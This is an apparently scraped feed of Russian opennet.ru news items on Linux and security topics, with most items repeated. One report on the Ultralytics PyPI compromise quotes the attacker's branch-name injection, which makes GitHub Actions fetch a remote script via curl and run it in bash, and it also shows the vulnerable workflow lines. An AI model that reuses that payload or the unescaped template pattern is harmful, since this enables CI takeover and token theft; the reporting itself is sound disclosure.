Ошибка в обработчике GitHub Actions привела к публикации вредоносных релизов Ultralytics
Злоумышленники смогли выполнить код с правами обработчика GitHub Actions в репозитори Python-библиотеки Ultralytics, применяемой для решения задач компьютерного зрения, таких как определение объектов на изображениях и сегментирование изображений. После получения доступа к репозиторию атакующие опубликовали в каталоге PyPI несколько новых релизов Ultralytics, включающих вредоносные изменения для майнинга криптовалют. За последний месяц библиотека Ultralytics была загружена из каталога PyPI более 6.4 млн раз.
Для компрометации репозитория использовалась уязвимость в пакете ultralytics-actions, используемом в для автоматического запуска обработчиков при совершении определённых действий с репозиторием на GitHub при помощи механизма GitHub Actions. В проекте ultralytics уязвимый обработчик привязывался к событию pull_request_target и вызывался при поступлении новых pull-запросов. В частности, для форматирования кода в присылаемых pull-запросах вызывался обработчик format.yml и выполнялся код, указанный в секции "run" файла action.yml, в котором присутствовали shell-команды с шаблонами подстановки:
Таким образом, в shell-команды без должного экранирования подставлялось название Git-ветки, упоминаемой в pull-запросе. Примечательно, что в августе в пакете ultralytics-actions уже исправлялась похожая уязвимость, связанная с использованием внешнего значения в функции echo:
Для организации выполнения своего кода в контексте обработчика GitHub Actions атакующие отправили pull-запрос в репозиторий ultralytics, указав в качестве имени ветки:
Соответственно, при поступлении pull-запроса в код подставилась заданная атакующими строка "$(...)", которая при при последующем запуске скрипта привела к выполнению кода "curl -sSfL raw.githubusercontent.com/.../file.sh | bash".
Запуск кода в контексте GitHub Actions может использоваться для захвата токена доступа к репозиторию и других конфиденциальных данных. Как именно атакующим удалось сформировать релиз, получив возможность выполнения своего кода в GitHub Actions, пока точно не ясно, предполагается, что это стало возможным благодаря
изменению обработчика publish.yml (атакующие убрали проверку учётной записи с которой разрешено публиковать релизы в PyPI) и использованию техники отравления сборочного кэша GitHub Actions для подстановки своих данных в релиз.
Первый вредоносный релиз Ultralytics 8.3.41 был опубликован злоумышленниками в каталоге PyPI 4 декабря в 23:51 (MSK) и удалён в 12:15 на следующий день. В 15:47 был размещён ещё один релиз 8.3.42, который был удалён в 16:47. Таким образом вредоносные версии в общей сложности были доступны для загрузки около 13 часов. В состав выпусков
8.3.41 и 8.3.42 был добавлен код, осуществляющий загрузку с внешнего сервера компонента для майнинга криптовалюты.
Разработчики проекта устранили проблему и сформировали корректирующие релизы 8.3.43 и 8.3.44, но спустя два дня была совершена ещё одна атака, в ходе которой злоумышленники опубликовали сегодня в 04:41 и 05:27 (MSK) два дополнительных вредоносных релиза - 8.3.45 и 8.3.46, включающих другой код для майнинга. До окончания разбирательства пользователям рекомендуется повременить с установкой новых версий и зафиксировать в зависимостях выпуск 8.3.44.
https://opennet.ru/62365/
Злоумышленники смогли выполнить код с правами обработчика GitHub Actions в репозитори Python-библиотеки Ultralytics, применяемой для решения задач компьютерного зрения, таких как определение объектов на изображениях и сегментирование изображений. После получения доступа к репозиторию атакующие опубликовали в каталоге PyPI несколько новых релизов Ultralytics, включающих вредоносные изменения для майнинга криптовалют. За последний месяц библиотека Ultralytics была загружена из каталога PyPI более 6.4 млн раз.
Для компрометации репозитория использовалась уязвимость в пакете ultralytics-actions, используемом в для автоматического запуска обработчиков при совершении определённых действий с репозиторием на GitHub при помощи механизма GitHub Actions. В проекте ultralytics уязвимый обработчик привязывался к событию pull_request_target и вызывался при поступлении новых pull-запросов. В частности, для форматирования кода в присылаемых pull-запросах вызывался обработчик format.yml и выполнялся код, указанный в секции "run" файла action.yml, в котором присутствовали shell-команды с шаблонами подстановки:
git pull origin ${{ github.head\_ref || github.ref }}
git config --global user.name "${{ inputs.github\_username }}"
git config --global user.email "${{ inputs.github\_email }}"
Таким образом, в shell-команды без должного экранирования подставлялось название Git-ветки, упоминаемой в pull-запросе. Примечательно, что в августе в пакете ultralytics-actions уже исправлялась похожая уязвимость, связанная с использованием внешнего значения в функции echo:
echo "github.event.pull\_request.head.ref: ${{ github.event.pull\_request.head.ref }}"
Для организации выполнения своего кода в контексте обработчика GitHub Actions атакующие отправили pull-запрос в репозиторий ultralytics, указав в качестве имени ветки:
openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
Соответственно, при поступлении pull-запроса в код подставилась заданная атакующими строка "$(...)", которая при при последующем запуске скрипта привела к выполнению кода "curl -sSfL raw.githubusercontent.com/.../file.sh | bash".
Запуск кода в контексте GitHub Actions может использоваться для захвата токена доступа к репозиторию и других конфиденциальных данных. Как именно атакующим удалось сформировать релиз, получив возможность выполнения своего кода в GitHub Actions, пока точно не ясно, предполагается, что это стало возможным благодаря
изменению обработчика publish.yml (атакующие убрали проверку учётной записи с которой разрешено публиковать релизы в PyPI) и использованию техники отравления сборочного кэша GitHub Actions для подстановки своих данных в релиз.
Первый вредоносный релиз Ultralytics 8.3.41 был опубликован злоумышленниками в каталоге PyPI 4 декабря в 23:51 (MSK) и удалён в 12:15 на следующий день. В 15:47 был размещён ещё один релиз 8.3.42, который был удалён в 16:47. Таким образом вредоносные версии в общей сложности были доступны для загрузки около 13 часов. В состав выпусков
8.3.41 и 8.3.42 был добавлен код, осуществляющий загрузку с внешнего сервера компонента для майнинга криптовалюты.
Разработчики проекта устранили проблему и сформировали корректирующие релизы 8.3.43 и 8.3.44, но спустя два дня была совершена ещё одна атака, в ходе которой злоумышленники опубликовали сегодня в 04:41 и 05:27 (MSK) два дополнительных вредоносных релиза - 8.3.45 и 8.3.46, включающих другой код для майнинга. До окончания разбирательства пользователям рекомендуется повременить с установкой новых версий и зафиксировать в зависимостях выпуск 8.3.44.
https://opennet.ru/62365/
Релиз дистрибутива Manjaro Linux 24.2
Опубликован релиз дистрибутива Manjaro Linux 24.2, построенного на основе Arch Linux и ориентированного на начинающих пользователей. Дистрибутив примечателен наличием упрощённого и дружественного пользователю процесса установки, поддержкой автоматического определения оборудования и установки необходимых для его работы драйверов. Manjaro поставляется в виде live-сборок с графическими окружениями KDE (3.9 ГБ), GNOME (3.8 ГБ) и Xfce (3.5 ГБ), сформированными для архитектуры x86_64 и различных плат на базе процессоров ARM. При участии сообщества дополнительно развиваются сборки с Budgie, Cinnamon, Deepin, LXQt и i3.
Для управления репозиториями в Manjaro используется собственный инструментарий BoxIt, спроектированный по образу Git. Репозиторий поддерживается по принципу непрерывного включения обновлений (rolling), но новые версии проходят дополнительную стадию стабилизации. Кроме собственного репозитория, имеется поддержка использования репозитория AUR (Arch User Repository). Дистрибутив снабжён графическим инсталлятором и графическим интерфейсом для настройки системы.
Особенности выпуска:
- Редакция на базе GNOME обновлена до выпуска GNOME 47, в котором предложен новый стиль диалоговых окон, улучшена работа на системах с низким разрешением экрана, задействовано аппаратное ускорение кодирования видео при записи скринкастов, полностью переработаны диалоги открытия и сохранения файлов.
- Редакция на основе KDE обновлена до версии KDE Plasma 6.2. Приложения KDE как и в прошлом выпуске соответствуют ветке KDE Gear 24.08.
- Редакция на основе Xfce продолжает поставляться с версией Xfce 4.18.
- Ядро Linux обновлено до версии 6.12. Дополнительно доступны пакеты с LTS-выпусками ядра 6.1 и 6.6.
https://opennet.ru/62368/
Опубликован релиз дистрибутива Manjaro Linux 24.2, построенного на основе Arch Linux и ориентированного на начинающих пользователей. Дистрибутив примечателен наличием упрощённого и дружественного пользователю процесса установки, поддержкой автоматического определения оборудования и установки необходимых для его работы драйверов. Manjaro поставляется в виде live-сборок с графическими окружениями KDE (3.9 ГБ), GNOME (3.8 ГБ) и Xfce (3.5 ГБ), сформированными для архитектуры x86_64 и различных плат на базе процессоров ARM. При участии сообщества дополнительно развиваются сборки с Budgie, Cinnamon, Deepin, LXQt и i3.
Для управления репозиториями в Manjaro используется собственный инструментарий BoxIt, спроектированный по образу Git. Репозиторий поддерживается по принципу непрерывного включения обновлений (rolling), но новые версии проходят дополнительную стадию стабилизации. Кроме собственного репозитория, имеется поддержка использования репозитория AUR (Arch User Repository). Дистрибутив снабжён графическим инсталлятором и графическим интерфейсом для настройки системы.
Особенности выпуска:
- Редакция на базе GNOME обновлена до выпуска GNOME 47, в котором предложен новый стиль диалоговых окон, улучшена работа на системах с низким разрешением экрана, задействовано аппаратное ускорение кодирования видео при записи скринкастов, полностью переработаны диалоги открытия и сохранения файлов.
- Редакция на основе KDE обновлена до версии KDE Plasma 6.2. Приложения KDE как и в прошлом выпуске соответствуют ветке KDE Gear 24.08.
- Редакция на основе Xfce продолжает поставляться с версией Xfce 4.18.
- Ядро Linux обновлено до версии 6.12. Дополнительно доступны пакеты с LTS-выпусками ядра 6.1 и 6.6.
https://opennet.ru/62368/
Microsoft опубликовал дистрибутив Azure Linux 3.0.20241203
Компания Microsoft опубликовала обновление дистрибутива Azure Linux 3.0.20241203. Дистрибутив развивается в качестве универсальной базовой платформы для Linux-окружений, используемых в облачной инфраструктуре, edge-системах и различных сервисах Microsoft. Собственные наработки проекта распространяются под лицензией MIT. Сборки пакетов формируются для архитектур aarch64 и x86_64. Размер установочного образа 750 МБ.
Среди изменений в новой версии:
- Пакетный фильтр iptables переведён на обработку команд через трансляцию правил в байткод nftables (по умолчанию вместо iptables-legacy задействован пакет iptables-nft).
- Для систем Aarch64 предложен дополнительный пакет с ядром kernel-64k, в котором используются большие страницы памяти, размером 64КБ (ядро собрано с опцией CONFIG_ARM64_64K_PAGES).
- В пакетный менеджер tdnf (аналог dnf на базе C libs), добавлена поддержка настройки "installonlypkgs", которая задействована для организации установки ядра kernel-64k.
- При использовании systemd-networkd включена обработка livenet rootfs из Dracut.
- Добавлен драйвер для сетевых адаптеров Intel Ethernet Connection E800.
- В обработчик логов fluent-bit добавлена поддержка языка Lua.
- Включена проверка по цифровой подписи ядер, загружаемых через механизм kexec.
- Для определения сборок контейнеров вместо проверки файла "/.dockerenv" задействована утилита systemd-detect-virt.
- Обновлены версии пакетов, среди которых ядро Linux
6.6.57, shim 15.8, SymCrypt 103.6.0, Valkey (форк Redis) 8.0.1, Go 1.23.3, MariaDB 10.11.10, PostgreSQL 16.5.
Дистрибутив Azure Linux предоставляет небольшой типовой набор основных пакетов, выступающих универсальной основой для создания начинки контейнеров, хост-окружений и сервисов, запускаемых в облачных инфраструктурах и на edge-устройствах. Более сложные и специализированные решения могут создаваться путём добавления дополнительных пакетов поверх Azure Linux, но основа для всех подобных систем остаётся неизменной, что упрощает сопровождение и подготовку обновлений.
Azure Linux применяется в качестве основы мини-дистрибутива WSLg, в котором предоставляются компоненты графического стека для организации запуска GUI-приложений Linux в окружениях на базе подсистемы WSL2 (Windows Subsystem for Linux). Расширенная функциональность в WSLg реализуется через включение дополнительных пакетов с композитным сервером Weston, XWayland, PulseAudio и FreeRDP.
Для управления сервисами и загрузкой применяется системный менеджер systemd. Для управления пакетами поставляются пакетные менеджеры RPM и DNF. SSH-сервер по умолчанию не включается.
Для установки дистрибутива предоставляется инсталлятор, который может работать как в текстовом, так и в графическом режимах. В инсталляторе предоставляется возможность установки с полным или базовым набором пакетов, предлагается интерфейс для выбора дискового раздела, выбора имени хоста и создания пользователей.
Система сборки Azure Linux позволяет генерировать как отдельные RPM-пакеты на основе SPEC-файлов и исходных текстов, так и монолитные системные образы, формируемые при помощи инструментария rpm-ostree и обновляемые атомарно без разбивки на отдельные пакеты. Соответственно, поддерживается две модели доставки обновлений: через обновление отдельных пакетов и через перестроение и обновление всего системного образа. Доступен репозиторий, включающий около 3000 уже собранных RPM-пакетов, который можно использовать для компоновки собственных образов на основе файла конфигурации.
Базовая платформа включает только самые необходимые компоненты и оптимизирована для минимального потребления памяти и дискового пространства, а также для высокой скорости загрузки. В проекте применяется подход "максимальная безопасность по умолчанию", подразумевающий включение различных дополнительных механизмо...
https://opennet.ru/62369/
Компания Microsoft опубликовала обновление дистрибутива Azure Linux 3.0.20241203. Дистрибутив развивается в качестве универсальной базовой платформы для Linux-окружений, используемых в облачной инфраструктуре, edge-системах и различных сервисах Microsoft. Собственные наработки проекта распространяются под лицензией MIT. Сборки пакетов формируются для архитектур aarch64 и x86_64. Размер установочного образа 750 МБ.
Среди изменений в новой версии:
- Пакетный фильтр iptables переведён на обработку команд через трансляцию правил в байткод nftables (по умолчанию вместо iptables-legacy задействован пакет iptables-nft).
- Для систем Aarch64 предложен дополнительный пакет с ядром kernel-64k, в котором используются большие страницы памяти, размером 64КБ (ядро собрано с опцией CONFIG_ARM64_64K_PAGES).
- В пакетный менеджер tdnf (аналог dnf на базе C libs), добавлена поддержка настройки "installonlypkgs", которая задействована для организации установки ядра kernel-64k.
- При использовании systemd-networkd включена обработка livenet rootfs из Dracut.
- Добавлен драйвер для сетевых адаптеров Intel Ethernet Connection E800.
- В обработчик логов fluent-bit добавлена поддержка языка Lua.
- Включена проверка по цифровой подписи ядер, загружаемых через механизм kexec.
- Для определения сборок контейнеров вместо проверки файла "/.dockerenv" задействована утилита systemd-detect-virt.
- Обновлены версии пакетов, среди которых ядро Linux
6.6.57, shim 15.8, SymCrypt 103.6.0, Valkey (форк Redis) 8.0.1, Go 1.23.3, MariaDB 10.11.10, PostgreSQL 16.5.
Дистрибутив Azure Linux предоставляет небольшой типовой набор основных пакетов, выступающих универсальной основой для создания начинки контейнеров, хост-окружений и сервисов, запускаемых в облачных инфраструктурах и на edge-устройствах. Более сложные и специализированные решения могут создаваться путём добавления дополнительных пакетов поверх Azure Linux, но основа для всех подобных систем остаётся неизменной, что упрощает сопровождение и подготовку обновлений.
Azure Linux применяется в качестве основы мини-дистрибутива WSLg, в котором предоставляются компоненты графического стека для организации запуска GUI-приложений Linux в окружениях на базе подсистемы WSL2 (Windows Subsystem for Linux). Расширенная функциональность в WSLg реализуется через включение дополнительных пакетов с композитным сервером Weston, XWayland, PulseAudio и FreeRDP.
Для управления сервисами и загрузкой применяется системный менеджер systemd. Для управления пакетами поставляются пакетные менеджеры RPM и DNF. SSH-сервер по умолчанию не включается.
Для установки дистрибутива предоставляется инсталлятор, который может работать как в текстовом, так и в графическом режимах. В инсталляторе предоставляется возможность установки с полным или базовым набором пакетов, предлагается интерфейс для выбора дискового раздела, выбора имени хоста и создания пользователей.
Система сборки Azure Linux позволяет генерировать как отдельные RPM-пакеты на основе SPEC-файлов и исходных текстов, так и монолитные системные образы, формируемые при помощи инструментария rpm-ostree и обновляемые атомарно без разбивки на отдельные пакеты. Соответственно, поддерживается две модели доставки обновлений: через обновление отдельных пакетов и через перестроение и обновление всего системного образа. Доступен репозиторий, включающий около 3000 уже собранных RPM-пакетов, который можно использовать для компоновки собственных образов на основе файла конфигурации.
Базовая платформа включает только самые необходимые компоненты и оптимизирована для минимального потребления памяти и дискового пространства, а также для высокой скорости загрузки. В проекте применяется подход "максимальная безопасность по умолчанию", подразумевающий включение различных дополнительных механизмо...
https://opennet.ru/62369/
Уязвимости, позволяющие подменить образы и выполнить код на ASU-серверах проекта OpenWrt
В развиваемом проектом OpenWrt инструментарии ASU (Attended SysUpgrade) выявлены критические уязвимости (CVE-2024-54143), позволяющие скомпрометировать сборочные артефакты, распространяемые через сервис sysupgrade.openwrt.org или сторонние ASU-серверы, и добиться установки модифицированных злоумышленником образов прошивок на системы
пользователей, применяющих для обновления прошивок режим "attended upgrade" через web-интерфейс selector.openwrt.org или инструментарий командной строки attended.sysupgrade.
Для успешного проведения атаки злоумышленнику достаточно отправить запрос формирования сборки на сервер ASU (подобные запросы любой пользователь может отправить без прохождения аутентификации). Через манипуляции со специально оформленным списком пакетов атакующий может организовать отправку ранее сгенерированных вредоносных образов в ответ на легитимные сборочные запросы других пользователей.
Сервис ASU применяется в OpenWrt для формирования и установки обновлений прошивок без потери имеющихся настроек и установленных пользователем пакетов. Через web-интерфейс или инструментарий командной строки пользователь отправляет запрос на формирование обновлённого образа прошивки, указывая установленные в его системе пакеты. Через какое-то время сервер ASU формирует образ, соответствующий заказанному содержимому, после чего пользователь загружает его и прошивает его на своё устройство. Дополнительно предоставляется опция, позволяющая сохранить в обновлённой прошивке имеющиеся настройки.
За обработку запросов от пользователей отвечает ASU Server, который запускает автоматическую сборку образов прошивок при помощи инструментария ImageBuilder, а также поддерживает кэш из ранее подготовленных сборок. В случае, если пользователь запросил образ, который уже ранее собирался на сервере и сохраняет актуальность, система сразу отдаёт имеющийся образ из кэша без запуска сборочного процесса.
Поведение атаки стало возможным благодаря двум уязвимостям:
- Уязвимость в обработчике запросов build_reques.py из состава инструментария Imagebuilder, позволяющая добиться подстановки своих команд в сборочный процесс через передачу пользователем специально оформленных имён пакетов. Уязвимость вызвана отсутствием должной проверки спецсимволов в именах пакетов перед их использованием в числе аргументов утилиты make. Воспользовавшись данной уязвимостью атакующий может сформировать на сервере вредоносные образы прошивок, подписанные корректным сборочным ключом.
- Уязвимость в библиотеке util.py, вызванная тем, что хэши SHA-256, используемые для проверки наличия в кэше уже готовых образов прошивок, обрезались до 12 символов, что значительно снижало уровень энтропии и позволяло через подбор коллизий сформировать вредоносный образ, хэш которого совпадает с легитимным образом. В сочетании с уязвимостью в Imagebuilder проблема с хэшами могла использоваться атакующим для "загрязнения" кэша ASU Server и размещения в нём вредоносных образов, отдаваемых на запросы обычных пользователей.
Изменение, после которых появилась возможность совершения атаки, было внесено 8 июля. Проблема устранена 4 декабря. Для обеспечения работы сервиса ASU использовались отдельные серверы, не пересекающиеся с основными сборочными системами проекта, отделённые от OpenWrt Buildbot и не имеющие доступа к таким конфиденциальным ресурсам, как SSH-ключи и сертификаты для формирования цифровых подписей.
Утверждается, что разработчики OpenWrt не нашли следов компрометации инфраструктуры проекта, но для подстраховки с нуля переустановили системы, на которых выполнялись уязвимые компоненты. Проблема не затронула официальные образы, распространяемые через сайт downloads.openwrt.org, а при анализе сборочных логов не было найдено следов отправки вредоносных запросов. При этом, так как на серверах ASU выполняется автоматическая чистка сборок старш...
https://opennet.ru/62371/
В развиваемом проектом OpenWrt инструментарии ASU (Attended SysUpgrade) выявлены критические уязвимости (CVE-2024-54143), позволяющие скомпрометировать сборочные артефакты, распространяемые через сервис sysupgrade.openwrt.org или сторонние ASU-серверы, и добиться установки модифицированных злоумышленником образов прошивок на системы
пользователей, применяющих для обновления прошивок режим "attended upgrade" через web-интерфейс selector.openwrt.org или инструментарий командной строки attended.sysupgrade.
Для успешного проведения атаки злоумышленнику достаточно отправить запрос формирования сборки на сервер ASU (подобные запросы любой пользователь может отправить без прохождения аутентификации). Через манипуляции со специально оформленным списком пакетов атакующий может организовать отправку ранее сгенерированных вредоносных образов в ответ на легитимные сборочные запросы других пользователей.
Сервис ASU применяется в OpenWrt для формирования и установки обновлений прошивок без потери имеющихся настроек и установленных пользователем пакетов. Через web-интерфейс или инструментарий командной строки пользователь отправляет запрос на формирование обновлённого образа прошивки, указывая установленные в его системе пакеты. Через какое-то время сервер ASU формирует образ, соответствующий заказанному содержимому, после чего пользователь загружает его и прошивает его на своё устройство. Дополнительно предоставляется опция, позволяющая сохранить в обновлённой прошивке имеющиеся настройки.
За обработку запросов от пользователей отвечает ASU Server, который запускает автоматическую сборку образов прошивок при помощи инструментария ImageBuilder, а также поддерживает кэш из ранее подготовленных сборок. В случае, если пользователь запросил образ, который уже ранее собирался на сервере и сохраняет актуальность, система сразу отдаёт имеющийся образ из кэша без запуска сборочного процесса.
Поведение атаки стало возможным благодаря двум уязвимостям:
- Уязвимость в обработчике запросов build_reques.py из состава инструментария Imagebuilder, позволяющая добиться подстановки своих команд в сборочный процесс через передачу пользователем специально оформленных имён пакетов. Уязвимость вызвана отсутствием должной проверки спецсимволов в именах пакетов перед их использованием в числе аргументов утилиты make. Воспользовавшись данной уязвимостью атакующий может сформировать на сервере вредоносные образы прошивок, подписанные корректным сборочным ключом.
- Уязвимость в библиотеке util.py, вызванная тем, что хэши SHA-256, используемые для проверки наличия в кэше уже готовых образов прошивок, обрезались до 12 символов, что значительно снижало уровень энтропии и позволяло через подбор коллизий сформировать вредоносный образ, хэш которого совпадает с легитимным образом. В сочетании с уязвимостью в Imagebuilder проблема с хэшами могла использоваться атакующим для "загрязнения" кэша ASU Server и размещения в нём вредоносных образов, отдаваемых на запросы обычных пользователей.
Изменение, после которых появилась возможность совершения атаки, было внесено 8 июля. Проблема устранена 4 декабря. Для обеспечения работы сервиса ASU использовались отдельные серверы, не пересекающиеся с основными сборочными системами проекта, отделённые от OpenWrt Buildbot и не имеющие доступа к таким конфиденциальным ресурсам, как SSH-ключи и сертификаты для формирования цифровых подписей.
Утверждается, что разработчики OpenWrt не нашли следов компрометации инфраструктуры проекта, но для подстраховки с нуля переустановили системы, на которых выполнялись уязвимые компоненты. Проблема не затронула официальные образы, распространяемые через сайт downloads.openwrt.org, а при анализе сборочных логов не было найдено следов отправки вредоносных запросов. При этом, так как на серверах ASU выполняется автоматическая чистка сборок старш...
https://opennet.ru/62371/
Линус Торвальдс раскритиковал попытки привязки к версиям микроархитектуры x86_64
В ответ на присланный для ядра Linux патч с поддержкой ключей компилятора, указывающих "версию" микроархитектуры x86_64 (microarchitecture level), Линус Торвальдс высказал довольно жёсткую и технически обоснованную критику насчёт данной инициативы. Под версиями подразумеваются упоминаемые компаниями AMD, Intel, Red Hat и SUSE срезы состояния микроархитектуры, охватывающие определённые наборы расширений, например, x86-64-v3 подразумевает наличие расширений AVX, AVX2, BMI2, FMA, LZCNT, MOVBE и SXSAVE, а x86-64-v4 - AVX512F, AVX512BW, AVX512CD, AVX512DQ, AVX512VL.
Претензии Линуса сводятся к трём пунктам:
- Упомянутая классификация абсолютно неофициальна и ничему формально не соответствует.
- Система версий заменяет относительно простой вопрос "умеет ли этот процессор такую команду?" на значительно более сложный "что вообще такое x86_64 v3 и чего оно умеет?!".
- Предметом критики стала идея попыток линеаризации CPUID и упрощения его до "версий". Это оказалось настолько неуспешной идеей, что привело к тому, что самые последние модели процессоров Intel для настольных систем, которые не реализуют AVX-512, формально относятся к более младшей версии, чем более старые процессоры с поддержкой AVX-512, что является довольно странной ситуацией.
https://opennet.ru/62370/
В ответ на присланный для ядра Linux патч с поддержкой ключей компилятора, указывающих "версию" микроархитектуры x86_64 (microarchitecture level), Линус Торвальдс высказал довольно жёсткую и технически обоснованную критику насчёт данной инициативы. Под версиями подразумеваются упоминаемые компаниями AMD, Intel, Red Hat и SUSE срезы состояния микроархитектуры, охватывающие определённые наборы расширений, например, x86-64-v3 подразумевает наличие расширений AVX, AVX2, BMI2, FMA, LZCNT, MOVBE и SXSAVE, а x86-64-v4 - AVX512F, AVX512BW, AVX512CD, AVX512DQ, AVX512VL.
Претензии Линуса сводятся к трём пунктам:
- Упомянутая классификация абсолютно неофициальна и ничему формально не соответствует.
- Система версий заменяет относительно простой вопрос "умеет ли этот процессор такую команду?" на значительно более сложный "что вообще такое x86_64 v3 и чего оно умеет?!".
- Предметом критики стала идея попыток линеаризации CPUID и упрощения его до "версий". Это оказалось настолько неуспешной идеей, что привело к тому, что самые последние модели процессоров Intel для настольных систем, которые не реализуют AVX-512, формально относятся к более младшей версии, чем более старые процессоры с поддержкой AVX-512, что является довольно странной ситуацией.
https://opennet.ru/62370/
Четвёртый альфа-выпуск среды рабочего стола COSMIC
Компания System76, разрабатывающая Linux-дистрибутив Pop!_OS, представила четвёртую альфа-версию среды рабочего стола COSMIC, написанной на языке Rust (не путать со старым COSMIC, который был основан на GNOME Shell). Для тестирования предложены iso-образы cо свежей версией COSMIC, сформированные поверх альфа-сборок будущего выпуска дистрибутива Pop!_OS 24.04 для систем с GPU NVIDIA (3 ГБ) и Intel/AMD (2.6 ГБ). Также доступны готовые пакеты для Fedora, NixOS, Arch Linux, openSUSE, Serpent OS, Redox и CachyOS.
COSMIC развивается как универсальный проект, не привязанный к конкретному дистрибутиву и соответствующий спецификациям Freedesktop. Для построения интерфейса в COSMIC задействована библиотека Iced, которая использует безопасные типы, модульную архитектуру и модель реактивного программирования, а также предлагает архитектуру, привычную для разработчиков, знакомых с языком декларативного построения интерфейсов Elm. Предоставляется несколько движков отрисовки, поддерживающих Vulkan, Metal, DX12, OpenGL 2.1+ и OpenGL ES 2.0+. Разработчикам предлагается готовый набор виджетов, возможность создавать асинхронные обработчики и использовать адаптивную компоновку элементов интерфейса в зависимости от размера окна и экрана. Проектом также разрабатывается композитный сервер cosmic-comp на базе Wayland.
Основные изменения по сравнению с третьей альфа-версией COSMIC:
- В конфигуратор добавлена страница для выбора языка интерфейса и форматов даты, времени и чисел.
- В конфигуратор добавлена страница для настройки запускаемых по умолчанию приложений, таких как браузер, файловый менеджер, почтовый клиент, музыкальный проигрыватель, видеоплеер, просмотрщик изображений и календарь-планировщик. Для воспроизведения звука и видео задействован находящийся в разработке новый мультимедийный проигрыватель COSMIC Media Player, написанный на языке Rust.
- Продолжено развитие собственного менеджера приложений "COSMIC Store", в котором во время установки или обновления приложений теперь можно посмотреть список всех выполняемых и завершённых задач (в нижнем левом углу появилось новое контекстное меню "Details").
- В интерфейс управления энергопотреблением добавлены раздельные настройки с условиями переключения экрана в спящий режим при автономной работе или стационарном подключении. Также добавлена опция для выключения экрана после заданного времени неактивности.
- Для панели подготовлен новый апплет "Accessibility", предназначенный для включения и отключения экранного ридера для людей, имеющих проблемы со зрением. Озвучивание контента экранным ридером работает в COSMIC Settings, Firefox и приложениях GNOME.
- В композитный сервер osmic-comp и настройки экрана добавлена поддержка включения механизма VRR (Variable Refresh Rate), позволяющего адаптивно менять частоту обновления монитора для обеспечения плавности и отсутствия разрывов во время игр и показа видео. Помимо постоянного включения VRR доступна опция для активации VRR только для полноэкранных приложений.
- Решены проблемы, приводившие к высокой нагрузке на CPU, зависаниям и утечкам памяти.
- Устранена уязвимость, позволявшая обойти блокировку экрана и получить доступ к рабочему столу без прохождения аутентификации после аварийного завершения композитного сервера и компонента cosmic-greeter, выводящего экран входа с систему. Процесс завершался при отключении экрана, например, для входа без ввода пароля достаточно было выключить и включить монитор.
https://opennet.ru/62360/
Компания System76, разрабатывающая Linux-дистрибутив Pop!_OS, представила четвёртую альфа-версию среды рабочего стола COSMIC, написанной на языке Rust (не путать со старым COSMIC, который был основан на GNOME Shell). Для тестирования предложены iso-образы cо свежей версией COSMIC, сформированные поверх альфа-сборок будущего выпуска дистрибутива Pop!_OS 24.04 для систем с GPU NVIDIA (3 ГБ) и Intel/AMD (2.6 ГБ). Также доступны готовые пакеты для Fedora, NixOS, Arch Linux, openSUSE, Serpent OS, Redox и CachyOS.
COSMIC развивается как универсальный проект, не привязанный к конкретному дистрибутиву и соответствующий спецификациям Freedesktop. Для построения интерфейса в COSMIC задействована библиотека Iced, которая использует безопасные типы, модульную архитектуру и модель реактивного программирования, а также предлагает архитектуру, привычную для разработчиков, знакомых с языком декларативного построения интерфейсов Elm. Предоставляется несколько движков отрисовки, поддерживающих Vulkan, Metal, DX12, OpenGL 2.1+ и OpenGL ES 2.0+. Разработчикам предлагается готовый набор виджетов, возможность создавать асинхронные обработчики и использовать адаптивную компоновку элементов интерфейса в зависимости от размера окна и экрана. Проектом также разрабатывается композитный сервер cosmic-comp на базе Wayland.
Основные изменения по сравнению с третьей альфа-версией COSMIC:
- В конфигуратор добавлена страница для выбора языка интерфейса и форматов даты, времени и чисел.
- В конфигуратор добавлена страница для настройки запускаемых по умолчанию приложений, таких как браузер, файловый менеджер, почтовый клиент, музыкальный проигрыватель, видеоплеер, просмотрщик изображений и календарь-планировщик. Для воспроизведения звука и видео задействован находящийся в разработке новый мультимедийный проигрыватель COSMIC Media Player, написанный на языке Rust.
- Продолжено развитие собственного менеджера приложений "COSMIC Store", в котором во время установки или обновления приложений теперь можно посмотреть список всех выполняемых и завершённых задач (в нижнем левом углу появилось новое контекстное меню "Details").
- В интерфейс управления энергопотреблением добавлены раздельные настройки с условиями переключения экрана в спящий режим при автономной работе или стационарном подключении. Также добавлена опция для выключения экрана после заданного времени неактивности.
- Для панели подготовлен новый апплет "Accessibility", предназначенный для включения и отключения экранного ридера для людей, имеющих проблемы со зрением. Озвучивание контента экранным ридером работает в COSMIC Settings, Firefox и приложениях GNOME.
- В композитный сервер osmic-comp и настройки экрана добавлена поддержка включения механизма VRR (Variable Refresh Rate), позволяющего адаптивно менять частоту обновления монитора для обеспечения плавности и отсутствия разрывов во время игр и показа видео. Помимо постоянного включения VRR доступна опция для активации VRR только для полноэкранных приложений.
- Решены проблемы, приводившие к высокой нагрузке на CPU, зависаниям и утечкам памяти.
- Устранена уязвимость, позволявшая обойти блокировку экрана и получить доступ к рабочему столу без прохождения аутентификации после аварийного завершения композитного сервера и компонента cosmic-greeter, выводящего экран входа с систему. Процесс завершался при отключении экрана, например, для входа без ввода пароля достаточно было выключить и включить монитор.
https://opennet.ru/62360/
Let's Encrypt прекращает поддержку протокола OCSP для проверки отозванных сертификатов
Некоммерческий удостоверяющий центр Let's Encrypt, контролируемый сообществом и предоставляющий сертификаты безвозмездно всем желающим, принял решение прекратить поддержку протокола OCSP (Online Certificate Status Protocol), применяемого для проверки отзыва сертификатов. Вместо протокола OCSP предлагается использовать списки отозванных сертификатов (CRL - Certificate Revocation List), публикуемые сервисом Let's Encrypt начиная с 2022 года. 7 мая 2025 года Let's Encrypt отключит добавление ссылок на адреса OCSP в выдаваемые сертификаты и прекратит обработку запросов, связанных с использованием расширения "OCSP Must Staple". 6 августа 2025 года обработчики OCSP-запросов будут отключены на серверах.
